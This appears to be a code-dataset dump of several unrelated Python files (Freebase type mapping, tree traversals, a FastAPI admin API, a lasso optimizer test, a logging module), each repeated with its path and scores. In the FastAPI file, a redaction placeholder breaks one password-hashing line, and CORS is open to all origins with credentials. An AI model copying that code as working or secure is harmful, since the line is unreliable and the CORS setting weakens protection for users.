types.extend(set(map(lambda x: x[:x.rfind("/")], types)))
if len(types) > 0:
countFreebaseTypes(types)
#freebaseTypes[dbpediaID] = types
if config.get("one_type_per_line"):
for fbType in types:
typeWriter.writerow([dbpediaID, FREEBASE_RDF_PREFIX + fbType])
else:
typeWriter.writerow([dbpediaID, ",".join(types)])
except KeyError:
print row[0]
typeIdentifierWriter = csv.writer(open(outfile_freebase_identifier, "w"), delimiter='\t')
typeIdentifierWriter.writerows([[k, v] for (k, v) in freebaseTypeDict.items()])
if __name__ == "__main__":
if len(sys.argv) != 4:
print __doc__
else:
main() | index/src/main/scripts/DBpediaResource/types_freebase.py | from collections import defaultdict
import sys, csv, bz2, re
import rdflib
import getopt
#Read command line options
options, operands = getopt.getopt(sys.argv[4:], "", ["one_type_per_line"])
config = dict(options)
config.setdefault("one_type_per_line", False)
csv.field_size_limit(1000000000)
IGNORED_PREFIXES = ["/base/", "/user/", "/m/", "/common/topic", "/freebase",
"/influence", "/dataworld", "/common", "/type", "/atom"]
FREEBASE_RDF_PREFIX = "http://rdf.freebase.com/ns"
def filterTypes(freebase_type):
#Ignore domains, since domain equality for Freebase is defined within DBpedia Spotlight (FreebaseType.equals(...))
if freebase_type.count("/") < 2:
return False
#Ignore all of these prefixes:
for prefix in IGNORED_PREFIXES:
if freebase_type.startswith(prefix):
return False
return True
def getSubjectAndObject(line, predicate, safe=True):
if safe:
g = rdflib.Graph()
g.parse(data=line, format="nt")
subject = g.subjects().next()
object = g.objects().next()
return subject, object
else:
r = re.search("<(.*)> <" + predicate + "> <(.*)>.*", line)
if r is not None :
subject = r.group(1)
object = r.group(2)
return subject, object
else:
#E.g.:<http://en.wikipedia.org/wiki/AfroAsiaticLanguages> <http://dbpedia.org/ontology/wikiPageID> "40"^^<http://www.w3.org/2001/XMLSchema#integer> .
r = re.search("<(.*)> <" + predicate + "> \"(.*)\".*", line)
if r is not None :
subject = r.group(1)
object = r.group(2)
return subject, object
def addToDictionary(ntfile, dictionary, predicate, label=None, safe=True, objects_as_list=False, reverse=False, sfunc=str, ofunc=str):
if ntfile.endswith(".bz2"):
f = bz2.BZ2File(ntfile)
else:
f = open(ntfile)
i = 0
for next in f:
i += 1
if next is None or next == "":
break
try:
if reverse:
object, subject = getSubjectAndObject(next, predicate, safe=safe)
else:
subject, object = getSubjectAndObject(next, predicate, safe=safe)
except TypeError:
continue
subject = sfunc(subject)
if subject not in dictionary:
dictionary[subject] = {}
if objects_as_list:
if label not in dictionary[subject]:
dictionary[subject][label] = [object]
elif object not in dictionary[subject][label]:
dictionary[subject][label].append(object)
elif label is None:
dictionary[subject] = ofunc(object)
else:
dictionary[subject][label] = ofunc(object)
return dictionary
freebaseTypeDict = defaultdict(int)
def countFreebaseTypes(freebaseTypes):
#Extend the list of types with the base types but only count them once (list -> set)
freebaseTypesToCount = freebaseTypes[:]
freebaseTypesToCount.extend(set(map(lambda x: "/" + x.split("/")[1], freebaseTypes)))
for freebaseType in freebaseTypesToCount:
freebaseTypeDict[freebaseType] += 1
def main():
page_ids = sys.argv[1]
wiki_links = sys.argv[2]
freebase_dump = sys.argv[3]
outfile_types = "types.freebase.tsv"
outfile_freebase_identifier = "typestats.freebase.tsv"
print >>sys.stderr, "Reading Wikipedia id to Wikipedia page mapping..."
idToPage = addToDictionary(page_ids, {}, "http://dbpedia.org/ontology/wikiPageID", reverse=True, safe=False,
ofunc=lambda x: str(x).replace("http://en.wikipedia.org/wiki/", ""))
print >>sys.stderr, "Reading Wikipedia page to DBpedia mapping..."
pageToDBpedia = addToDictionary(wiki_links, {}, "http://xmlns.com/foaf/0.1/primaryTopic", safe=False,
sfunc=lambda x: str(x).replace("http://en.wikipedia.org/wiki/", ""),
ofunc=lambda x: str(x).replace("http://dbpedia.org/resource/", ""))
freebaseReader = csv.reader(bz2.BZ2File(freebase_dump), delimiter='\t')
#freebaseTypes = {}
print >>sys.stderr, "Processing Freebase dump..."
typeWriter = csv.writer(open(outfile_types, "w"), delimiter='\t')
for row in freebaseReader:
if row[3].startswith("/wikipedia/en_"):
#There is a match with Wikipedia:
wikiID = row[3].replace("/wikipedia/en_id/", "")
try:
wikiPage = idToPage[wikiID]
dbpediaID = pageToDBpedia[wikiPage]
types = filter(filterTypes, row[4].split(","))
types.extend(set(map(lambda x: x[:x.rfind("/")], types)))
if len(types) > 0:
countFreebaseTypes(types)
#freebaseTypes[dbpediaID] = types
if config.get("one_type_per_line"):
for fbType in types:
typeWriter.writerow([dbpediaID, FREEBASE_RDF_PREFIX + fbType])
else:
typeWriter.writerow([dbpediaID, ",".join(types)])
except KeyError:
print row[0]
typeIdentifierWriter = csv.writer(open(outfile_freebase_identifier, "w"), delimiter='\t')
typeIdentifierWriter.writerows([[k, v] for (k, v) in freebaseTypeDict.items()])
if __name__ == "__main__":
if len(sys.argv) != 4:
print __doc__
else:
main() | 0.319121 | 0.145085 |
from __future__ import annotations
from typing import Optional
class TreeNode:
def __init__(self, val: int, left: Optional[TreeNode] = None, right: Optional[TreeNode] = None) -> None:
self.val = val
self.left = left
self.right = right
def preorder(root: TreeNode) -> list[int]:
stack: list[TreeNode] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
result.append(cur.val)
if cur.right:
stack.append(cur.right)
cur = cur.left
else:
cur = stack.pop()
return result
def preorder2(root: TreeNode) -> list[int]:
stack: list[TreeNode] = [root]
result: list[int] = []
while stack:
cur = stack.pop()
result.append(cur.val)
if cur.right: stack.append(cur.right)
if cur.left: stack.append(cur.left)
return result
def inorder(root: TreeNode) -> list[int]:
stack: list[TreeNode] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
stack.append(cur)
cur = cur.left
else:
cur = stack.pop()
result.append(cur.val)
cur = cur.right
return result
def inorder2(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, bool]] = [(root, False)]
result: list[int] = []
while stack:
cur, visited = stack.pop()
if not visited:
stack.append((cur, True))
if cur.left: stack.append((cur.left, False))
else:
result.append(cur.val)
if cur.right: stack.append((cur.right, False))
return result
# Morris Traversal
def inorder3(root: TreeNode) -> list[int]:
result: list[int] = []
cur: Optional[TreeNode] = root
while cur:
if not cur.left:
result.append(cur.val)
cur = cur.right
else:
linker: TreeNode = cur.left
while linker.right != cur and linker.right is not None:
linker = linker.right
if linker.right == cur:
result.append(cur.val)
cur = cur.right
linker.right = None
else:
linker.right = cur
cur = cur.left
return result
def postorder(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, bool]] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
stack.append((cur, False))
cur = cur.left
else:
cur, visited = stack.pop()
if visited:
result.append(cur.val)
cur = None
else:
stack.append((cur, True))
cur = cur.right
return result
def postorder2(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, int]] = [(root, 0)]
result: list[int] = []
while stack:
cur, state = stack.pop()
if state == 0:
stack.append((cur, 1))
if cur.left: stack.append((cur.left, 0))
if state == 1:
stack.append((cur, 2))
if cur.right: stack.append((cur.right, 0))
if state == 2:
result.append(cur.val)
return result
def _gen_tree() -> TreeNode:
nodes: list[TreeNode] = []
for i in range(6):
nodes.append(TreeNode(i))
nodes[0].left = nodes[1]
nodes[1].right = nodes[2]
nodes[2].left = nodes[3]
nodes[0].right = nodes[4]
nodes[4].right = nodes[5]
return nodes[0]
if __name__ == '__main__':
root = _gen_tree()
# print(preorder2(root))
# print(inorder3(root))
# print(postorder2(root)) | .archived/snakecode/other/btree_traversal.py | from __future__ import annotations
from typing import Optional
class TreeNode:
def __init__(self, val: int, left: Optional[TreeNode] = None, right: Optional[TreeNode] = None) -> None:
self.val = val
self.left = left
self.right = right
def preorder(root: TreeNode) -> list[int]:
stack: list[TreeNode] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
result.append(cur.val)
if cur.right:
stack.append(cur.right)
cur = cur.left
else:
cur = stack.pop()
return result
def preorder2(root: TreeNode) -> list[int]:
stack: list[TreeNode] = [root]
result: list[int] = []
while stack:
cur = stack.pop()
result.append(cur.val)
if cur.right: stack.append(cur.right)
if cur.left: stack.append(cur.left)
return result
def inorder(root: TreeNode) -> list[int]:
stack: list[TreeNode] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
stack.append(cur)
cur = cur.left
else:
cur = stack.pop()
result.append(cur.val)
cur = cur.right
return result
def inorder2(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, bool]] = [(root, False)]
result: list[int] = []
while stack:
cur, visited = stack.pop()
if not visited:
stack.append((cur, True))
if cur.left: stack.append((cur.left, False))
else:
result.append(cur.val)
if cur.right: stack.append((cur.right, False))
return result
# Morris Traversal
def inorder3(root: TreeNode) -> list[int]:
result: list[int] = []
cur: Optional[TreeNode] = root
while cur:
if not cur.left:
result.append(cur.val)
cur = cur.right
else:
linker: TreeNode = cur.left
while linker.right != cur and linker.right is not None:
linker = linker.right
if linker.right == cur:
result.append(cur.val)
cur = cur.right
linker.right = None
else:
linker.right = cur
cur = cur.left
return result
def postorder(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, bool]] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
stack.append((cur, False))
cur = cur.left
else:
cur, visited = stack.pop()
if visited:
result.append(cur.val)
cur = None
else:
stack.append((cur, True))
cur = cur.right
return result
def postorder2(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, int]] = [(root, 0)]
result: list[int] = []
while stack:
cur, state = stack.pop()
if state == 0:
stack.append((cur, 1))
if cur.left: stack.append((cur.left, 0))
if state == 1:
stack.append((cur, 2))
if cur.right: stack.append((cur.right, 0))
if state == 2:
result.append(cur.val)
return result
def _gen_tree() -> TreeNode:
nodes: list[TreeNode] = []
for i in range(6):
nodes.append(TreeNode(i))
nodes[0].left = nodes[1]
nodes[1].right = nodes[2]
nodes[2].left = nodes[3]
nodes[0].right = nodes[4]
nodes[4].right = nodes[5]
return nodes[0]
if __name__ == '__main__':
root = _gen_tree()
# print(preorder2(root))
# print(inorder3(root))
# print(postorder2(root)) | 0.764012 | 0.426859 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional
from uuid import UUID
from dotenv import load_dotenv
import os
from datetime import timedelta
from fastapi import Depends, FastAPI, HTTPException, status
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from jose import JWTError, jwt
from passlib.context import CryptContext
from starlette.middleware.cors import CORSMiddleware
import uvicorn
from sqlalchemy.orm import Session
from app.utils import crud, models, schemas
from app.utils import processing
from app.utils.schemas import AdminUser, TokenData
from app.utils.processing import get_users, get_user, \
get_password_hash, authenticate_user, create_access_token
from app.utils.database import SessionLocal, engine
models.Base.metadata.create_all(bind=engine)
load_dotenv()
SECRET_KEY = str(os.getenv("SECRET_KEY"))
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 30
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # Allows all origins
allow_credentials=True,
allow_methods=["*"], # Allows all methods
allow_headers=["*"], # Allows all headers
)
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="access_token")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
# Dependency
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
async def get_current_user(access_token: str = Depends(oauth2_scheme),
db: Session = Depends(get_db)):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
try:
payload = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
username: str = payload.get("sub")
if username is None:
raise credentials_exception
token_data = TokenData(username=username)
except JWTError:
raise credentials_exception
user_obj = await crud.get_users(db)
user_dict = get_users(user_obj)
user = get_user(user_dict, username=token_data.username)
if user is None:
raise credentials_exception
return user
async def get_current_active_user(current_user: AdminUser = Depends(get_current_user)):
if current_user.disabled:
raise HTTPException(status_code=400, detail="Inactive user")
return current_user
@app.post("/access_token", response_model=schemas.Token)
async def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends(),
db: Session = Depends(get_db)):
user_obj = await crud.get_users(db)
user_dict = get_users(user_obj)
user = authenticate_user(
user_dict, form_data.username, form_data.password)
if not user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": user.username}, expires_delta=access_token_expires
)
return {"access_token": access_token, "token_type": "bearer"}
@app.get("/users/me")
async def read_users_me(current_user: AdminUser = Depends(get_current_active_user)):
return current_user
@app.post("/user/create/")
async def create_user(
user: schemas.AdminUserCreate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
if not current_user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
db_user = await crud.get_user_by_username(db, username=user.username)
if db_user:
raise HTTPException(status_code=400, detail="User already registered")
password_hashed = <PASSWORD>_password_hash(user.password)
return await crud.create_admin_user(db=db, user=user, password=password_hashed)
@app.post("/user/update/")
async def update_user(
user: schemas.AdminUserCreate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
if not current_user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
db_user = await crud.get_user_by_username(db, username=user.username)
if not db_user:
raise HTTPException(status_code=400, detail="User is not registered")
password_hashed = get_password_hash(user.password)
return await crud.update_admin_user(db=db, user=user, password=password_hashed)
@app.post("/user/delete/")
async def delete_user(
user: schemas.AdminUserDelete, db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
db_user = await crud.get_user_by_username(db, username=user.username)
if not db_user:
raise HTTPException(status_code=400, detail="User not registered")
else:
return await crud.delete_admin_user(db=db, user=user)
@app.get("/users/", response_model=List[schemas.AdminUser])
async def read_users(users: AdminUser = Depends(get_current_active_user),
skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
return await crud.get_users(db, skip=skip, limit=limit)
@app.get("/users/{user_id}", response_model=schemas.AdminUser)
async def read_user(user_id: int, db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
db_user = await crud.get_user_by_id(db, id=user_id)
if db_user is None:
raise HTTPException(status_code=404, detail="User not found")
return db_user
@app.post("/data/upload/")
async def upload_data(db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
return await crud.upload_data(db=db)
@app.get("/data/all", response_model=List[schemas.Data])
async def get_all_data(page: int, entries_per_page: int,
current_user: AdminUser = Depends(
get_current_active_user), db: Session = Depends(get_db)):
return await crud.paginate_data(page, entries_per_page, db)
@app.get("/data/filter_by")
async def filter_data(
filter_parameter: str,
save_as_csv: bool = False,
city_name: Optional[str] = None,
range_start: Optional[str] = None,
range_end: Optional[str] = None,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
return await crud.filter_by_parameters(filter_parameter, city_name, range_start, range_end, db, save_as_csv)
@app.post("/data/update/{transaction_id}")
async def update_data(transaction_id: UUID,
data: schemas.DataUpdate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
db_data = await crud.get_data_by_id(db, transaction_id=transaction_id)
if not db_data:
raise HTTPException(status_code=400, detail="Data not found!")
else:
return await crud.update_data(db=db, data=data, transaction_id=transaction_id)
@app.post("/data/delete/")
async def delete_data(transaction_id: UUID,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)
):
db_data = await crud.get_data_by_id(db, transaction_id=transaction_id)
if not db_data:
raise HTTPException(status_code=400, detail="Data not found")
else:
return await crud.delete_data(db=db, transaction_id=transaction_id)
if __name__ == "__main__":
processing.init_admin_user(db=SessionLocal()) # create default admin user
uvicorn.run("main:app", host="0.0.0.0", port=5000, reload=True) | main.py |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional
from uuid import UUID
from dotenv import load_dotenv
import os
from datetime import timedelta
from fastapi import Depends, FastAPI, HTTPException, status
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from jose import JWTError, jwt
from passlib.context import CryptContext
from starlette.middleware.cors import CORSMiddleware
import uvicorn
from sqlalchemy.orm import Session
from app.utils import crud, models, schemas
from app.utils import processing
from app.utils.schemas import AdminUser, TokenData
from app.utils.processing import get_users, get_user, \
get_password_hash, authenticate_user, create_access_token
from app.utils.database import SessionLocal, engine
models.Base.metadata.create_all(bind=engine)
load_dotenv()
SECRET_KEY = str(os.getenv("SECRET_KEY"))
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 30
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # Allows all origins
allow_credentials=True,
allow_methods=["*"], # Allows all methods
allow_headers=["*"], # Allows all headers
)
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="access_token")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
# Dependency
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
async def get_current_user(access_token: str = Depends(oauth2_scheme),
db: Session = Depends(get_db)):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
try:
payload = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
username: str = payload.get("sub")
if username is None:
raise credentials_exception
token_data = TokenData(username=username)
except JWTError:
raise credentials_exception
user_obj = await crud.get_users(db)
user_dict = get_users(user_obj)
user = get_user(user_dict, username=token_data.username)
if user is None:
raise credentials_exception
return user
async def get_current_active_user(current_user: AdminUser = Depends(get_current_user)):
if current_user.disabled:
raise HTTPException(status_code=400, detail="Inactive user")
return current_user
@app.post("/access_token", response_model=schemas.Token)
async def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends(),
db: Session = Depends(get_db)):
user_obj = await crud.get_users(db)
user_dict = get_users(user_obj)
user = authenticate_user(
user_dict, form_data.username, form_data.password)
if not user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": user.username}, expires_delta=access_token_expires
)
return {"access_token": access_token, "token_type": "bearer"}
@app.get("/users/me")
async def read_users_me(current_user: AdminUser = Depends(get_current_active_user)):
return current_user
@app.post("/user/create/")
async def create_user(
user: schemas.AdminUserCreate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
if not current_user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
db_user = await crud.get_user_by_username(db, username=user.username)
if db_user:
raise HTTPException(status_code=400, detail="User already registered")
password_hashed = <PASSWORD>_password_hash(user.password)
return await crud.create_admin_user(db=db, user=user, password=password_hashed)
@app.post("/user/update/")
async def update_user(
user: schemas.AdminUserCreate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
if not current_user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
db_user = await crud.get_user_by_username(db, username=user.username)
if not db_user:
raise HTTPException(status_code=400, detail="User is not registered")
password_hashed = get_password_hash(user.password)
return await crud.update_admin_user(db=db, user=user, password=password_hashed)
@app.post("/user/delete/")
async def delete_user(
user: schemas.AdminUserDelete, db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
db_user = await crud.get_user_by_username(db, username=user.username)
if not db_user:
raise HTTPException(status_code=400, detail="User not registered")
else:
return await crud.delete_admin_user(db=db, user=user)
@app.get("/users/", response_model=List[schemas.AdminUser])
async def read_users(users: AdminUser = Depends(get_current_active_user),
skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
return await crud.get_users(db, skip=skip, limit=limit)
@app.get("/users/{user_id}", response_model=schemas.AdminUser)
async def read_user(user_id: int, db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
db_user = await crud.get_user_by_id(db, id=user_id)
if db_user is None:
raise HTTPException(status_code=404, detail="User not found")
return db_user
@app.post("/data/upload/")
async def upload_data(db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
return await crud.upload_data(db=db)
@app.get("/data/all", response_model=List[schemas.Data])
async def get_all_data(page: int, entries_per_page: int,
current_user: AdminUser = Depends(
get_current_active_user), db: Session = Depends(get_db)):
return await crud.paginate_data(page, entries_per_page, db)
@app.get("/data/filter_by")
async def filter_data(
filter_parameter: str,
save_as_csv: bool = False,
city_name: Optional[str] = None,
range_start: Optional[str] = None,
range_end: Optional[str] = None,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
return await crud.filter_by_parameters(filter_parameter, city_name, range_start, range_end, db, save_as_csv)
@app.post("/data/update/{transaction_id}")
async def update_data(transaction_id: UUID,
data: schemas.DataUpdate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)):
db_data = await crud.get_data_by_id(db, transaction_id=transaction_id)
if not db_data:
raise HTTPException(status_code=400, detail="Data not found!")
else:
return await crud.update_data(db=db, data=data, transaction_id=transaction_id)
@app.post("/data/delete/")
async def delete_data(transaction_id: UUID,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(
get_current_active_user)
):
db_data = await crud.get_data_by_id(db, transaction_id=transaction_id)
if not db_data:
raise HTTPException(status_code=400, detail="Data not found")
else:
return await crud.delete_data(db=db, transaction_id=transaction_id)
if __name__ == "__main__":
processing.init_admin_user(db=SessionLocal()) # create default admin user
uvicorn.run("main:app", host="0.0.0.0", port=5000, reload=True) | 0.764056 | 0.092442 |
from typing import cast
import numpy
import scipy.stats # type: ignore
from optimizer import trust_region
from overloads import difference
from overloads.typedefs import ndarray
class Sample:
beta: ndarray
X: ndarray
Y: ndarray
lambda_: float
beta_decomp: ndarray
def symm_eig(self, A: ndarray) -> ndarray:
A = (A.T + A) / 2
return cast(ndarray, numpy.linalg.eigh(A)[0])
def orthogonal_X(self, X: ndarray) -> ndarray:
for i in range(1, X.shape[1]):
norm = numpy.sqrt(X[:, i] @ X[:, i])
X[:, i] -= X[:, :i] @ numpy.linalg.lstsq(X[:, :i], X[:, i], rcond=None)[0]
X[:, i] *= norm / numpy.sqrt(X[:, i] @ X[:, i])
return X
def soft_threshold(self, beta: ndarray, lambda_: ndarray) -> ndarray:
beta = numpy.sign(beta) * numpy.maximum(numpy.abs(beta) - lambda_, 0.0)
return beta
def lasso_decomp(self) -> ndarray:
m, n = self.X.shape
beta_decomp: ndarray = numpy.linalg.lstsq(self.X, self.Y, rcond=None)[0]
beta_decomp = self.soft_threshold(
beta_decomp,
(m / 2.0 * self.lambda_)
* numpy.linalg.lstsq(self.X.T @ self.X, numpy.ones((n,)), rcond=None)[0],
)
return beta_decomp
def __init__(self, m: int, n: int) -> None:
self.beta = self.symm_eig(numpy.random.rand(n, n).T)
self.X = self.orthogonal_X(scipy.stats.norm.ppf(numpy.random.rand(n, m).T))
self.Y = self.X @ self.beta + scipy.stats.norm.ppf(numpy.random.rand(m))
self.lambda_ = 2 * numpy.quantile(
numpy.abs(numpy.linalg.lstsq(self.X, self.Y, rcond=None)[0]), 0.3
)
self.beta_decomp = self.lasso_decomp()
numpy.random.seed(5489)
def lasso_objective(beta: ndarray, X: ndarray, Y: ndarray, lambda_: float) -> float:
err = Y - X @ beta
obj = err @ err / err.shape[0]
obj += lambda_ * numpy.sum(numpy.abs(beta))
return float(obj)
def lasso_gradient(beta: ndarray, X: ndarray, Y: ndarray, lambda_: float) -> ndarray:
err = Y - X @ beta
grad = cast(ndarray, -(2 * err) @ X / err.shape[0])
grad[beta < 0] += -lambda_
grad[beta > 0] += lambda_
return grad
def once(m: int, n: int) -> None:
sample = Sample(m, n)
constraints = (
numpy.empty((0, n)),
numpy.empty((0,)),
numpy.full((n,), -numpy.inf),
numpy.full((n,), numpy.inf),
)
opts = trust_region.Trust_Region_Options(max_iter=500)
opts.check_rel = 1
opts.check_abs = 1e-5
result = trust_region.trust_region(
lambda beta: lasso_objective(beta, sample.X, sample.Y, sample.lambda_),
lambda beta: lasso_gradient(beta, sample.X, sample.Y, sample.lambda_),
numpy.zeros((n,)),
constraints,
opts,
)
abserr = difference.absolute(result.x, sample.beta_decomp)
relerr = abserr / numpy.mean(numpy.abs(sample.beta_decomp))
print(f"result.success: {result.success}")
print(f"relerr : {relerr}")
print(f"abserr : {abserr}")
print(
"result.x : \n",
numpy.concatenate(
(
sample.beta_decomp.reshape((-1, 1)),
result.x.reshape((-1, 1)),
),
axis=1,
),
)
assert relerr < 0.35
assert abserr < 0.35
class Test:
def test1(self) -> None:
once(m=1000, n=4)
def test2(self) -> None:
once(m=1000, n=8)
def test3(self) -> None:
once(m=1000, n=16)
def test4(self) -> None:
once(m=1000, n=32)
if __name__ == "__main__":
Test().test1()
Test().test2()
Test().test3()
Test().test4() | tests/test_lasso.py | from typing import cast
import numpy
import scipy.stats # type: ignore
from optimizer import trust_region
from overloads import difference
from overloads.typedefs import ndarray
class Sample:
beta: ndarray
X: ndarray
Y: ndarray
lambda_: float
beta_decomp: ndarray
def symm_eig(self, A: ndarray) -> ndarray:
A = (A.T + A) / 2
return cast(ndarray, numpy.linalg.eigh(A)[0])
def orthogonal_X(self, X: ndarray) -> ndarray:
for i in range(1, X.shape[1]):
norm = numpy.sqrt(X[:, i] @ X[:, i])
X[:, i] -= X[:, :i] @ numpy.linalg.lstsq(X[:, :i], X[:, i], rcond=None)[0]
X[:, i] *= norm / numpy.sqrt(X[:, i] @ X[:, i])
return X
def soft_threshold(self, beta: ndarray, lambda_: ndarray) -> ndarray:
beta = numpy.sign(beta) * numpy.maximum(numpy.abs(beta) - lambda_, 0.0)
return beta
def lasso_decomp(self) -> ndarray:
m, n = self.X.shape
beta_decomp: ndarray = numpy.linalg.lstsq(self.X, self.Y, rcond=None)[0]
beta_decomp = self.soft_threshold(
beta_decomp,
(m / 2.0 * self.lambda_)
* numpy.linalg.lstsq(self.X.T @ self.X, numpy.ones((n,)), rcond=None)[0],
)
return beta_decomp
def __init__(self, m: int, n: int) -> None:
self.beta = self.symm_eig(numpy.random.rand(n, n).T)
self.X = self.orthogonal_X(scipy.stats.norm.ppf(numpy.random.rand(n, m).T))
self.Y = self.X @ self.beta + scipy.stats.norm.ppf(numpy.random.rand(m))
self.lambda_ = 2 * numpy.quantile(
numpy.abs(numpy.linalg.lstsq(self.X, self.Y, rcond=None)[0]), 0.3
)
self.beta_decomp = self.lasso_decomp()
numpy.random.seed(5489)
def lasso_objective(beta: ndarray, X: ndarray, Y: ndarray, lambda_: float) -> float:
err = Y - X @ beta
obj = err @ err / err.shape[0]
obj += lambda_ * numpy.sum(numpy.abs(beta))
return float(obj)
def lasso_gradient(beta: ndarray, X: ndarray, Y: ndarray, lambda_: float) -> ndarray:
err = Y - X @ beta
grad = cast(ndarray, -(2 * err) @ X / err.shape[0])
grad[beta < 0] += -lambda_
grad[beta > 0] += lambda_
return grad
def once(m: int, n: int) -> None:
sample = Sample(m, n)
constraints = (
numpy.empty((0, n)),
numpy.empty((0,)),
numpy.full((n,), -numpy.inf),
numpy.full((n,), numpy.inf),
)
opts = trust_region.Trust_Region_Options(max_iter=500)
opts.check_rel = 1
opts.check_abs = 1e-5
result = trust_region.trust_region(
lambda beta: lasso_objective(beta, sample.X, sample.Y, sample.lambda_),
lambda beta: lasso_gradient(beta, sample.X, sample.Y, sample.lambda_),
numpy.zeros((n,)),
constraints,
opts,
)
abserr = difference.absolute(result.x, sample.beta_decomp)
relerr = abserr / numpy.mean(numpy.abs(sample.beta_decomp))
print(f"result.success: {result.success}")
print(f"relerr : {relerr}")
print(f"abserr : {abserr}")
print(
"result.x : \n",
numpy.concatenate(
(
sample.beta_decomp.reshape((-1, 1)),
result.x.reshape((-1, 1)),
),
axis=1,
),
)
assert relerr < 0.35
assert abserr < 0.35
class Test:
def test1(self) -> None:
once(m=1000, n=4)
def test2(self) -> None:
once(m=1000, n=8)
def test3(self) -> None:
once(m=1000, n=16)
def test4(self) -> None:
once(m=1000, n=32)
if __name__ == "__main__":
Test().test1()
Test().test2()
Test().test3()
Test().test4() | 0.861115 | 0.678899 |
from __future__ import absolute_import, print_function
import os
import sys
import logging
import threading
import fibers
import six
from . import util
__all__ = ['get_logger']
# Add a new level: TRACE.
logging.TRACE = 5
assert logging.NOTSET < logging.TRACE < logging.DEBUG
logging.addLevelName('TRACE', logging.TRACE)
_logger_name = 'gruvi'
_logger_dict = {}
# The logging module documents this slight hack to disable finding caller
# information (via sys._getframe()) for every logging call. In our logger we
